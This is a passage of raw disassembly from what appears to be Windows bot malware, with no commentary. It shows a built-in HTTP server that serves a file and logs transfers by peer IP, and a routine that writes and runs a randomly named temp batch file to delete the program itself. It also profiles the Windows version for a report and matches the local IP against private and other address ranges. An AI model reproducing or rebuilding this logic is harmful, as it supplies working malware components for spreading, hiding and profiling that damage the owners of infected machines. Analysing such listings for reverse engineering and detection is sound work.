push eax
mov [ebp+0CA8h+var_D20], eax
call sub_407B70
add esp, 10h
push ebx
push ebx
push ebx
push esi
mov esi, ds:dword_41D074
call esi
push ebx
lea eax, [ebp+0CA8h+var_D28]
push eax
push edi
mov edi, ds:dword_41D078
jmp short loc_4188D1
; ---------------------------------------------------------------------------
loc_4188A9: ; CODE XREF: sub_418552+389�j
cmp [ebp+0CA8h+var_D28], ebx
jnz loc_418933
push [ebp+0CA8h+var_D1C]
push ebx
push [ebp+0CA8h+var_D20]
call sub_407B70
add esp, 0Ch
push ebx
push ebx
push ebx
push [ebp+0CA8h+var_D24]
call esi
push ebx
lea eax, [ebp+0CA8h+var_D28]
push eax
push [ebp+0CA8h+var_D1C]
loc_4188D1: ; CODE XREF: sub_418552+355�j
push [ebp+0CA8h+var_D20]
push [ebp+0CA8h+var_D24]
call edi
test eax, eax
jnz short loc_4188A9
jmp short loc_418933
; ---------------------------------------------------------------------------
loc_4188DF: ; CODE XREF: sub_418552+31A�j
mov esi, 200h
push esi
call sub_4036E0
push esi
mov edi, eax
push ebx
push edi
mov [ebp+0CA8h+var_D20], edi
call sub_407B70
add esp, 10h
push offset aQue? ; "Que?"
push edi
call sub_402A45
pop ecx
dec eax
push eax
push edi
call sub_402AEE
mov eax, edi
add esp, 0Ch
lea esi, [eax+1]
loc_418916: ; CODE XREF: sub_418552+3C9�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418916
sub eax, esi
mov [eax+edi], bl
mov eax, edi
lea esi, [eax+1]
loc_418927: ; CODE XREF: sub_418552+3DA�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418927
loc_41892E: ; CODE XREF: sub_418552+2F2�j
sub eax, esi
mov [ebp+0CA8h+var_D1C], eax
loc_418933: ; CODE XREF: sub_418552+35A�j
; sub_418552+38B�j
push 400h
lea eax, [ebp+0CA8h+var_508]
push ebx
push eax
call sub_407B70
push [ebp+0CA8h+var_D1C]
lea eax, [ebp+0CA8h+var_508]
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 ok\r\nContent-Length: %d\r\nCo"...
push 3FFh
push eax
call sub_402AEE
lea eax, [ebp+0CA8h+var_508]
add esp, 1Ch
lea esi, [eax+1]
loc_41896A: ; CODE XREF: sub_418552+41D�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41896A
sub eax, esi
mov [ebp+eax+0CA8h+var_508], bl
lea eax, [ebp+0CA8h+var_508]
lea esi, [eax+1]
loc_418983: ; CODE XREF: sub_418552+436�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_418983
sub eax, esi
mov esi, ds:dword_41D228
push ebx
push eax
lea eax, [ebp+0CA8h+var_508]
push eax
push [ebp+0CA8h+arg_0]
call esi
test eax, eax
jz loc_418ABE
push ebx
push [ebp+0CA8h+var_D1C]
push [ebp+0CA8h+var_D20]
push [ebp+0CA8h+arg_0]
call esi
test eax, eax
jz loc_418ABE
lea eax, [ebp+0CA8h+var_108]
push eax
push offset byte_4267B0
call sub_4028A9
test eax, eax
pop ecx
pop ecx
jnz loc_418ABE
push 100h
call sub_402648
mov esi, eax
push esi
call sub_402A45
push eax
mov ebx, offset dword_424ED0
call sub_4196D1
xor eax, eax
lea edi, [ebp+0CA8h+var_D18]
stosd
stosd
stosd
add esp, 0Ch
stosd
lea eax, [ebp+0CA8h+var_D24]
push eax
lea eax, [ebp+0CA8h+var_D18]
push eax
push [ebp+0CA8h+arg_0]
mov [ebp+0CA8h+var_D24], 10h
call ds:dword_41D248
movzx eax, [ebp+0CA8h+var_D11]
movzx ecx, [ebp+0CA8h+var_D12]
shl eax, 8
add eax, ecx
movzx ecx, [ebp+0CA8h+var_D13]
shl eax, 8
add eax, ecx
movzx ecx, [ebp+0CA8h+var_D14]
shl eax, 8
add eax, ecx
push 2
mov [ebp+0CA8h+var_D1C], eax
push 4
lea eax, [ebp+0CA8h+var_D1C]
push eax
call ds:dword_41D280
test eax, eax
push ds:dword_433940
jnz short loc_418A86
movzx eax, [ebp+0CA8h+var_D11]
push eax
movzx eax, [ebp+0CA8h+var_D12]
push eax
movzx eax, [ebp+0CA8h+var_D13]
push eax
movzx eax, [ebp+0CA8h+var_D14]
push eax
push offset aHttpTransferD_ ; "HTTP: Transfer: %d.%d.%d.%d (N/A). %d T"...
push esi
push 0
push offset dword_4269BC
call sub_417361
add esp, 24h
jmp short loc_418AB1
; ---------------------------------------------------------------------------
loc_418A86: ; CODE XREF: sub_418552+507�j
push dword ptr [eax]
movzx eax, [ebp+0CA8h+var_D11]
push eax
movzx eax, [ebp+0CA8h+var_D12]
push eax
movzx eax, [ebp+0CA8h+var_D13]
push eax
movzx eax, [ebp+0CA8h+var_D14]
push eax
push offset aHttpTransfer_0 ; "HTTP: Transfer: %d.%d.%d.%d (%s). %d To"...
push esi
push 0
push offset dword_4269BC
call sub_417361
add esp, 28h
loc_418AB1: ; CODE XREF: sub_418552+532�j
inc ds:dword_433940
push esi
call sub_402B9B
pop ecx
loc_418ABE: ; CODE XREF: sub_418552+453�j
; sub_418552+46A�j ...
push [ebp+0CA8h+var_D20]
call sub_403603
pop ecx
loc_418AC7: ; CODE XREF: sub_418552+189�j
push [ebp+0CA8h+arg_0]
call ds:dword_41D224
loc_418AD3: ; CODE XREF: sub_418552+19A�j
pop edi
loc_418AD4: ; CODE XREF: sub_418552+AB�j
mov ecx, [ebp+0CA8h+var_4]
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 0CA8h
leave
retn
sub_418552 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418AEB proc near ; DATA XREF: sub_418C40+27�o
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 401h
jz short loc_418AFE
pop ebp
jmp ds:dword_41D200
; ---------------------------------------------------------------------------
loc_418AFE: ; CODE XREF: sub_418AEB+A�j
mov eax, [ebp+arg_C]
dec eax
jz short loc_418B10
sub eax, 7
jnz short loc_418B19
call sub_41835D
jmp short loc_418B19
; ---------------------------------------------------------------------------
loc_418B10: ; CODE XREF: sub_418AEB+17�j
push [ebp+arg_8]
call sub_418552
pop ecx
loc_418B19: ; CODE XREF: sub_418AEB+1C�j
; sub_418AEB+23�j
xor eax, eax
pop ebp
retn 10h
sub_418AEB endp
; =============== S U B R O U T I N E =======================================
sub_418B1F proc near ; CODE XREF: sub_418C40+9B�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, 104h
push edi
xor ebp, ebp
push ebp
mov ebx, offset dword_4266A8
push ebx
call sub_407B70
push edi
push ebp
mov esi, offset dword_4268B8
push esi
call sub_407B70
push edi
push ebp
mov ebp, offset byte_4267B0
push ebp
call sub_407B70
add esp, 24h
push edi
push ebx
call ds:dword_41D0F4
push edi
mov ebx, offset byte_425061
call sub_4196D1
push esi
push offset dword_4266A8
push offset aSS_10 ; "%s\\%s"
push 103h
push ebp
call sub_402AEE
mov eax, ebp
add esp, 18h
lea ecx, [eax+1]
loc_418B85: ; CODE XREF: sub_418B1F+6B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418B85
push 0
push 1
sub eax, ecx
push 2
mov ds:byte_4267B0[eax], dl
call ds:dword_41D27C
cmp eax, 0FFFFFFFFh
mov ds:dword_4267AC, eax
jnz short loc_418BB8
push eax
loc_418BAB: ; CODE XREF: sub_418B1F+E7�j
call ds:dword_41D224
xor eax, eax
jmp loc_418C3B
; ---------------------------------------------------------------------------
loc_418BB8: ; CODE XREF: sub_418B1F+89�j
mov eax, 0FFDCh
mov ebx, 3E8h
call sub_4192C7
push eax
mov ds:dword_426594, eax
mov ds:word_426694, 2
call ds:dword_41D278
and ds:dword_426698, 0
push 10h
push offset word_426694
push ds:dword_4267AC
mov ds:word_426696, ax
call ds:dword_41D26C
test eax, eax
jz short loc_418C08
loc_418C00: ; CODE XREF: sub_418B1F+102�j
; sub_418B1F+114�j
push ds:dword_4267AC
jmp short loc_418BAB
; ---------------------------------------------------------------------------
loc_418C08: ; CODE XREF: sub_418B1F+DF�j
push 9
push 401h
push [esp+18h+arg_0]
push ds:dword_4267AC
call ds:dword_41D22C
test eax, eax
jnz short loc_418C00
push 4
push ds:dword_4267AC
call ds:dword_41D230
test eax, eax
jnz short loc_418C00
inc eax
mov ds:byte_4268B4, al
loc_418C3B: ; CODE XREF: sub_418B1F+94�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_418B1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418C40 proc near ; DATA XREF: sub_418D17+21�o
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 50h
mov eax, ds:dword_4266A4
push ebx
mov ebx, ds:dword_41D1F4
push esi
push edi
mov edi, 7F00h
push edi
xor esi, esi
push esi
mov [ebp+var_3C], eax
mov [ebp+var_28], offset dword_4255BC
mov [ebp+var_48], offset sub_418AEB
mov [ebp+var_4C], 8
mov [ebp+var_50], 30h
call ebx
push edi
push esi
mov [ebp+var_38], eax
call ebx
push edi
push esi
mov [ebp+var_24], eax
call ds:dword_41D20C
mov [ebp+var_34], eax
lea eax, [ebp+var_50]
push eax
mov [ebp+var_2C], esi
mov [ebp+var_44], esi
mov [ebp+var_40], esi
mov [ebp+var_30], 1
call ds:dword_41D1F0
test ax, ax
jz short loc_418D0E
push esi
push ds:dword_4266A4
mov eax, 80000000h
push esi
push esi
push esi
push esi
push eax
push eax
push 0CF0000h
push offset asc_420364 ; " "
push offset dword_4255BC
push esi
call ds:dword_41D1FC
push eax
call sub_418B1F
test eax, eax
pop ecx
jz short loc_418D0E
mov edi, ds:dword_41D208
jmp short loc_418D01
; ---------------------------------------------------------------------------
loc_418CED: ; CODE XREF: sub_418C40+CC�j
lea eax, [ebp+var_20]
push eax
call ds:dword_41D1F8
lea eax, [ebp+var_20]
push eax
call ds:dword_41D204
loc_418D01: ; CODE XREF: sub_418C40+AB�j
push esi
push esi
push esi
lea eax, [ebp+var_20]
push eax
call edi
test eax, eax
jnz short loc_418CED
loc_418D0E: ; CODE XREF: sub_418C40+70�j
; sub_418C40+A3�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_418C40 endp
; =============== S U B R O U T I N E =======================================
sub_418D17 proc near ; CODE XREF: sub_401F1C+70�p
; .kSjx934:0041BFC8�p
push 4
mov eax, offset loc_41C299
call sub_4045CC
push 8
call sub_40304B
mov esi, eax
pop ecx
mov [ebp-10h], esi
and dword ptr [ebp-4], 0
test esi, esi
jz short loc_418D4B
push offset sub_418C40
xor ecx, ecx
mov edi, offset aHs ; "HS"
call sub_4140AB
jmp short loc_418D4D
; ---------------------------------------------------------------------------
loc_418D4B: ; CODE XREF: sub_418D17+1F�j
xor eax, eax
loc_418D4D: ; CODE XREF: sub_418D17+32�j
cmp dword ptr [eax+4], 0
setnz al
call sub_40466B
retn
sub_418D17 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_418D5A proc near ; CODE XREF: sub_4192C7:loc_4192EB�p
mov eax, ds:dword_4265B0
mov edx, ds:dword_4265B4
lea ecx, ds:4265B8h[eax*4]
push esi
mov esi, eax
mov eax, ds:dword_4265B8[edx*4]
add eax, [ecx]
and eax, 3FFFFFFFh
inc esi
cmp esi, 37h
mov [ecx], eax
jnz short loc_418D87
xor esi, esi
loc_418D87: ; CODE XREF: sub_418D5A+29�j
inc edx
cmp edx, 37h
jnz short loc_418D8F
xor edx, edx
loc_418D8F: ; CODE XREF: sub_418D5A+31�j
mov ds:dword_4265B0, esi
mov ds:dword_4265B4, edx
sar eax, 6
pop esi
retn
sub_418D5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418DA0 proc near ; CODE XREF: sub_401CC0+125�p
; sub_41748B:loc_41759C�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
lea eax, [ebp+var_10]
push eax
call ds:dword_41D058
test eax, eax
jz short loc_418E1C
lea eax, [ebp+var_8]
push eax
call ds:dword_41D064
test eax, eax
jz short loc_418E1C
push [ebp+var_4]
push [ebp+var_8]
push [ebp+var_C]
push [ebp+var_10]
call sub_41C070
push 0
push 15180h
push edx
push eax
call sub_411800
push 0
push 0E10h
push ebx
push ecx
mov ds:dword_426598, eax
mov ds:dword_42659C, edx
call sub_411800
push 0
push 3Ch
push ebx
push ecx
mov ds:dword_4265A0, eax
mov ds:dword_4265A4, edx
call sub_41C070
mov ds:dword_4265A8, eax
mov ds:dword_4265AC, edx
loc_418E1C: ; CODE XREF: sub_418DA0+13�j
; sub_418DA0+21�j
pop ebx
leave
retn
sub_418DA0 endp
; =============== S U B R O U T I N E =======================================
sub_418E1F proc near ; CODE XREF: sub_401CC0+EF�p
; sub_41748B+BC�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
push 0
push esi
call sub_407B70
add esp, 0Ch
cmp [esp+arg_4], 0
push [esp+arg_0]
push esi
jz short loc_418E41
push 1002h
jmp short loc_418E43
; ---------------------------------------------------------------------------
loc_418E41: ; CODE XREF: sub_418E1F+19�j
push 7
loc_418E43: ; CODE XREF: sub_418E1F+20�j
push 800h
call ds:dword_41D054
mov eax, esi
retn
sub_418E1F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_418E51 proc near ; CODE XREF: sub_401CC0+DA�p
; sub_41748B+8B�p ...
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = byte ptr -84h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 98h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+74h+var_4], eax
push ebx
push edi
lea eax, [ebp+74h+var_98]
push eax
mov ebx, ecx
mov [ebp+74h+var_98], 94h
call ds:dword_41D068
push ebx
xor edi, edi
push edi
push esi
call sub_407B70
add esp, 0Ch
cmp [ebp+74h+var_94], 6
jnz short loc_418E9A
cmp [ebp+74h+var_90], edi
jnz short loc_418F05
push offset aVis ; "VIS"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418E9A: ; CODE XREF: sub_418E51+3B�j
cmp [ebp+74h+var_94], 5
jnz short loc_418EC6
cmp [ebp+74h+var_90], 2
jnz short loc_418EAD
push offset a2k3 ; "2K3"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EAD: ; CODE XREF: sub_418E51+53�j
cmp [ebp+74h+var_90], 1
jnz short loc_418EBA
push offset aXp_0 ; "XP"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EBA: ; CODE XREF: sub_418E51+60�j
cmp [ebp+74h+var_90], edi
jnz short loc_418F05
push offset a2k ; "2K"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EC6: ; CODE XREF: sub_418E51+4D�j
cmp [ebp+74h+var_94], 4
jnz short loc_418F05
cmp [ebp+74h+var_90], 5Ah
jnz short loc_418ED9
push offset aMe ; "ME"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418ED9: ; CODE XREF: sub_418E51+7F�j
cmp [ebp+74h+var_90], 1
jnz short loc_418EE6
push offset a98 ; "98"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EE6: ; CODE XREF: sub_418E51+8C�j
cmp [ebp+74h+var_90], edi
jnz short loc_418F05
cmp [ebp+74h+var_88], 2
jnz short loc_418EF8
push offset aNt ; "NT"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418EF8: ; CODE XREF: sub_418E51+9E�j
cmp [ebp+74h+var_88], 1
jnz short loc_418F17
push offset a95 ; "95"
jmp short loc_418F0A
; ---------------------------------------------------------------------------
loc_418F05: ; CODE XREF: sub_418E51+40�j
; sub_418E51+6C�j ...
push offset aUnk ; "UNK"
loc_418F0A: ; CODE XREF: sub_418E51+47�j
; sub_418E51+5A�j ...
lea eax, [ebx-1]
push eax
push esi
call sub_402AEE
add esp, 0Ch
loc_418F17: ; CODE XREF: sub_418E51+AB�j
mov eax, esi
lea edx, [eax+1]
loc_418F1C: ; CODE XREF: sub_418E51+D0�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_418F1C
sub eax, edx
cmp [ebp+74h+arg_0], cl
mov [eax+esi], cl
jz loc_418FB3
push ebx
call sub_402648
mov edi, eax
push edi
call sub_402A45
push eax
push 0
push edi
call sub_407B70
add esp, 14h
push [ebp+74h+var_8C]
lea eax, [ebp+74h+var_84]
push [ebp+74h+var_90]
push [ebp+74h+var_94]
push eax
push esi
push offset aOsMicrosoftWin ; "[OS: Microsoft Windows %s %s (%i.%i bui"...
push edi
call sub_402A45
pop ecx
dec eax
push eax
push edi
call sub_402AEE
mov eax, edi
add esp, 20h
lea ecx, [eax+1]
loc_418F75: ; CODE XREF: sub_418E51+129�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418F75
push ebx
sub eax, ecx
push 0
push esi
mov [eax+edi], dl
call sub_407B70
push edi
push offset aS_5 ; "%s"
dec ebx
push ebx
push esi
call sub_402AEE
mov eax, esi
add esp, 1Ch
lea ecx, [eax+1]
loc_418FA0: ; CODE XREF: sub_418E51+154�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_418FA0
sub eax, ecx
push edi
mov [eax+esi], dl
call sub_402B9B
pop ecx
loc_418FB3: ; CODE XREF: sub_418E51+DA�j
mov ecx, [ebp+74h+var_4]
pop edi
xor ecx, ebp
mov eax, esi
pop ebx
call sub_402710
add ebp, 74h
leave
retn
sub_418E51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418FC6 proc near ; CODE XREF: sub_401C1D+50�p
; sub_401CC0+FE�p ...
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push edi
xor eax, eax
lea edi, [ebp+var_18]
stosd
stosd
stosd
stosd
xor eax, eax
mov edi, esi
stosd
stosd
stosd
stosd
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_0]
mov [ebp+var_1C], 10h
call ds:dword_41D238
movzx eax, [ebp+var_11]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_13]
push eax
movzx eax, [ebp+var_14]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push 0Fh
push esi
call sub_402AEE
mov eax, esi
add esp, 1Ch
lea ecx, [eax+1]
loc_419029: ; CODE XREF: sub_418FC6+68�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_419029
sub eax, ecx
mov ecx, [ebp+var_8]
mov [eax+esi], dl
xor ecx, ebp
mov eax, esi
pop edi
call sub_402710
leave
retn
sub_418FC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419044 proc near ; CODE XREF: sub_401F1C+10C�p
; sub_417676+A5�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push esi
mov esi, ecx
mov cl, [eax]
test cl, cl
push edi
jz short loc_4190AD
loc_419052: ; CODE XREF: sub_419044+24�j
mov dl, [esi]
cmp dl, 2Ah
jz short loc_41906A
cmp dl, cl
jz short loc_419062
cmp dl, 3Fh
jnz short loc_419088
loc_419062: ; CODE XREF: sub_419044+17�j
inc esi
inc eax
mov cl, [eax]
test cl, cl
jnz short loc_419052
loc_41906A: ; CODE XREF: sub_419044+13�j
mov cl, [eax]
test cl, cl
jz short loc_4190AD
mov edi, [ebp+var_4]
loc_419073: ; CODE XREF: sub_419044+5F�j
mov dl, [esi]
cmp dl, 2Ah
jnz short loc_41908C
inc esi
cmp byte ptr [esi], 0
jz short loc_4190A7
mov [ebp+var_4], esi
lea edi, [eax+1]
jmp short loc_41909F
; ---------------------------------------------------------------------------
loc_419088: ; CODE XREF: sub_419044+1C�j
xor eax, eax
jmp short loc_4190B9
; ---------------------------------------------------------------------------
loc_41908C: ; CODE XREF: sub_419044+34�j
cmp dl, cl
jz short loc_41909D
cmp dl, 3Fh
jz short loc_41909D
mov esi, [ebp+var_4]
mov eax, edi
inc edi
jmp short loc_41909F
; ---------------------------------------------------------------------------
loc_41909D: ; CODE XREF: sub_419044+4A�j
; sub_419044+4F�j
inc esi
inc eax
loc_41909F: ; CODE XREF: sub_419044+42�j
; sub_419044+57�j
mov cl, [eax]
test cl, cl
jnz short loc_419073
jmp short loc_4190AD
; ---------------------------------------------------------------------------
loc_4190A7: ; CODE XREF: sub_419044+3A�j
xor eax, eax
inc eax
jmp short loc_4190B9
; ---------------------------------------------------------------------------
loc_4190AC: ; CODE XREF: sub_419044+6C�j
inc esi
loc_4190AD: ; CODE XREF: sub_419044+C�j
; sub_419044+2A�j ...
cmp byte ptr [esi], 2Ah
jz short loc_4190AC
xor eax, eax
cmp [esi], al
setz al
loc_4190B9: ; CODE XREF: sub_419044+46�j
; sub_419044+66�j
pop edi
pop esi
leave
retn
sub_419044 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4190BD proc near ; CODE XREF: sub_419477+14A�p
var_23C = byte ptr -23Ch
var_23B = byte ptr -23Bh
var_13C = byte ptr -13Ch
var_13B = byte ptr -13Bh
var_3C = byte ptr -3Ch
var_3B = byte ptr -3Bh
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 23Ch
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push ebx
push esi
xor ebx, ebx
push 37h
lea eax, [ebp+var_3B]
push ebx
push eax
mov [ebp+var_3C], bl
call sub_407B70
mov esi, 0FFh
push esi
lea eax, [ebp+var_23B]
push ebx
push eax
mov [ebp+var_23C], bl
call sub_407B70
push esi
lea eax, [ebp+var_13B]
push ebx
push eax
mov [ebp+var_13C], bl
call sub_407B70
add esp, 24h
push 100h
lea eax, [ebp+var_13C]
push eax
push ebx
call ds:dword_41D0E4
push eax
call ds:dword_41D060
lea eax, [ebp+var_13C]
push eax
push eax
lea eax, [ebp+var_23C]
push offset a@echoOff1DelSI ; "@echo off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
push eax
call sub_4030B5
push 104h
call sub_402648
mov esi, eax
push esi
call sub_402A45
add esp, 18h
dec eax
push eax
push esi
call ds:dword_41D0F4
call sub_403363
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call sub_403363
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call sub_403363
push 18h
cdq
pop ecx
idiv ecx
add edx, 61h
push edx
call sub_403363
push 0Ah
cdq
pop ecx
idiv ecx
push edx
call sub_403363
push 0Ah
cdq
pop ecx
idiv ecx
push edx
call sub_403363
push 0Ah
pop ecx
cdq
idiv ecx
lea eax, [ebp+var_3C]
push edx
push esi
push offset aSTmpIIICCC_bat ; "%s\\tmp-%i%i%i-%c%c%c.bat"
push eax
call sub_4030B5
push esi
call sub_402B9B
lea eax, [ebp+var_3C]
push offset aW ; "w"
push eax
call sub_4031F4
mov esi, eax
add esp, 30h
cmp esi, ebx
jz short loc_41920B
lea eax, [ebp+var_23C]
push eax
push offset aS_6 ; "%s"
push esi
call sub_403207
push esi
call sub_4034C4
add esp, 10h
push ebx
push ebx
push ebx
lea eax, [ebp+var_3C]
push eax
push ebx
push ebx
call ds:dword_41D1E4
loc_41920B: ; CODE XREF: sub_4190BD+122�j
mov ecx, [ebp+var_4]
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_4190BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419219 proc near ; CODE XREF: .kSjx934:0041BABE�p
; .kSjx934:0041BDC4�p
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_124 = dword ptr -124h
var_120 = byte ptr -120h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 170h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push ebx
push esi
push edi
xor ebx, ebx
push 40h
lea eax, [ebp+var_168]
push ebx
push eax
mov [ebp+var_16C], ebx
call sub_407B70
xor eax, eax
mov [ebp+var_124], ebx
lea edi, [ebp+var_120]
stosd
stosd
mov esi, 103h
push esi
stosd
lea eax, [ebp+var_113]
push ebx
push eax
mov [ebp+var_114], bl
call sub_407B70
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_114]
push esi
push eax
call sub_403436
add esp, 28h
lea eax, [ebp+var_124]
push eax
lea eax, [ebp+var_16C]
push eax
push ebx
push ebx
push 28h
push ebx
push ebx
push ebx
lea eax, [ebp+var_114]
push eax
push ebx
call ds:dword_41D05C
mov ecx, [ebp+var_8]
test eax, eax
pop edi
setnz al
pop esi
xor ecx, ebp
pop ebx
call sub_402710
leave
retn
sub_419219 endp
; ---------------------------------------------------------------------------
push 0
call sub_403540
pop ecx
retn
; =============== S U B R O U T I N E =======================================
sub_4192C7 proc near ; CODE XREF: .kSjx934:00413AAE�p
; .kSjx934:00413AC1�p ...
push esi
mov esi, eax
xor eax, eax
inc eax
sub eax, ebx
add esi, eax
cmp esi, 1
jg short loc_4192DA
mov eax, ebx
pop esi
retn
; ---------------------------------------------------------------------------
loc_4192DA: ; CODE XREF: sub_4192C7+D�j
push 2
pop eax
cmp esi, eax
jle short loc_4192E7
loc_4192E1: ; CODE XREF: sub_4192C7+1E�j
add eax, eax
cmp eax, esi
jl short loc_4192E1
loc_4192E7: ; CODE XREF: sub_4192C7+18�j
push edi
lea edi, [eax-1]
loc_4192EB: ; CODE XREF: sub_4192C7+2D�j
call sub_418D5A
and eax, edi
cmp eax, esi
jge short loc_4192EB
pop edi
add eax, ebx
pop esi
retn
sub_4192C7 endp
; =============== S U B R O U T I N E =======================================
sub_4192FB proc near ; CODE XREF: sub_401F1C+420�p
; .kSjx934:loc_413F5D�p ...
and ds:dword_4265B0, 0
push 0
mov ds:dword_4265B4, 1Fh
call sub_403540
mov edx, 3FFFFFFFh
and eax, edx
pop ecx
mov ds:dword_4265B8, eax
mov ds:dword_4265BC, 1
mov eax, offset dword_4265B8
push esi
loc_419330: ; CODE XREF: sub_4192FB+48�j
lea ecx, [eax+4]
mov esi, [ecx]
add esi, [eax]
and esi, edx
mov [eax+8], esi
mov eax, ecx
cmp eax, offset dword_42668C
jl short loc_419330
pop esi
retn
sub_4192FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419347 proc near ; CODE XREF: sub_41748B+E6�p
; sub_41A5C1+B6�p ...
var_24 = byte ptr -24h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 24h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
push esi
push edi
push ds:dword_4269BC
mov [ebp+var_14], 0
xor eax, eax
lea edi, [ebp+var_13]
stosd
stosd
stosd
stosw
lea esi, [ebp+var_14]
stosb
call sub_418FC6
pop ecx
mov eax, esi
mov ecx, offset a192_168__ ; "192.168.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a10___ ; "10.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a111___ ; "111.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a15___ ; "15.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a16___ ; "16.*.*.*"
call sub_419044
test eax, eax
jnz loc_419467
mov eax, esi
mov ecx, offset a101___ ; "101.*.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
mov eax, esi
mov ecx, offset a110___ ; "110.*.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
mov eax, esi
mov ecx, offset a112___ ; "112.*.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
mov eax, esi
mov ecx, offset a170_65__ ; "170.65.*.*"
call sub_419044
test eax, eax
jnz short loc_419467
push 10h
pop esi
loc_41941E: ; CODE XREF: sub_419347+11A�j
xor eax, eax
lea edi, [ebp+var_24]
stosd
stosd
stosd
push esi
push offset a172_D__ ; "172.%d.*.*"
stosd
lea eax, [ebp+var_24]
push 0Fh
push eax
call sub_402AEE
lea eax, [ebp+var_24]
add esp, 10h
lea edx, [eax+1]
loc_419441: ; CODE XREF: sub_419347+FF�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_419441
sub eax, edx
mov [ebp+eax+var_24], cl
lea eax, [ebp+var_14]
lea ecx, [ebp+var_24]
call sub_419044
test eax, eax
jnz short loc_419467
inc esi
cmp esi, 1Fh
jbe short loc_41941E
xor al, al
jmp short loc_419469
; ---------------------------------------------------------------------------
loc_419467: ; CODE XREF: sub_419347+3E�j
; sub_419347+52�j ...
mov al, 1
loc_419469: ; CODE XREF: sub_419347+11E�j
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_402710
leave
retn
sub_419347 endp
